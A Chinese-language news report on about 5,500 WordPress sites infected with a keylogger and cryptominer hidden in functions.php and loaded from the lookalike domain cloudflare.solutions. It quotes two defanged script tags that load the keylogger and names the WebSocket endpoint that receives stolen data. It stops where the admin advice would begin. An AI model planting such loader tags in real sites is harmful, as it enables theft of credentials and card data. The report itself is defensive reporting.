据外媒报道,大约 5500 个 WordPress 网站被发现感染了恶意脚本,会记录访问者的键盘操作,有时候还会加载运行在浏览器上的挖矿程序。 恶意脚本加载自域名 cloudflare.solutions,不过该域名与云计算服务商 Cloudflare 无关。 恶意脚本会同时在网站的前端和后端加载,这意味着它能用于窃取管理员登录凭证和 WordPress 电商网站的用户数据(如信用卡数据和用户个人信息)。 黑客通过各种手段攻击了 WordPress 站点,并将恶意脚本隐藏在 functions.php 文件中,这是一个所有 WordPress 主题都需要配备的文件。 攻击者的活动始于四月份 Sucuri 已经跟踪到了至少三种托管在 cloudflare.solutions 域名中的不同恶意脚本。
脚本活跃在近 5500 个 WordPress 站点上 根据网站源代码搜索引擎 PublicWWW 的数据,有 5496 个 WordPress 网站运行了该按键记录程序,它们的 Alexa 排名大多数在 Top 200,000 之外。 已知的两个加载按键记录程序的恶意脚本: < script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script > 被窃取的数据会被发送到 wss://cloudflare[.]solutions:8085/ 的远程 Websocket 上。 Sucuri 专家为发现在其网站上加载了恶意脚本的管理员提供以下建议:
|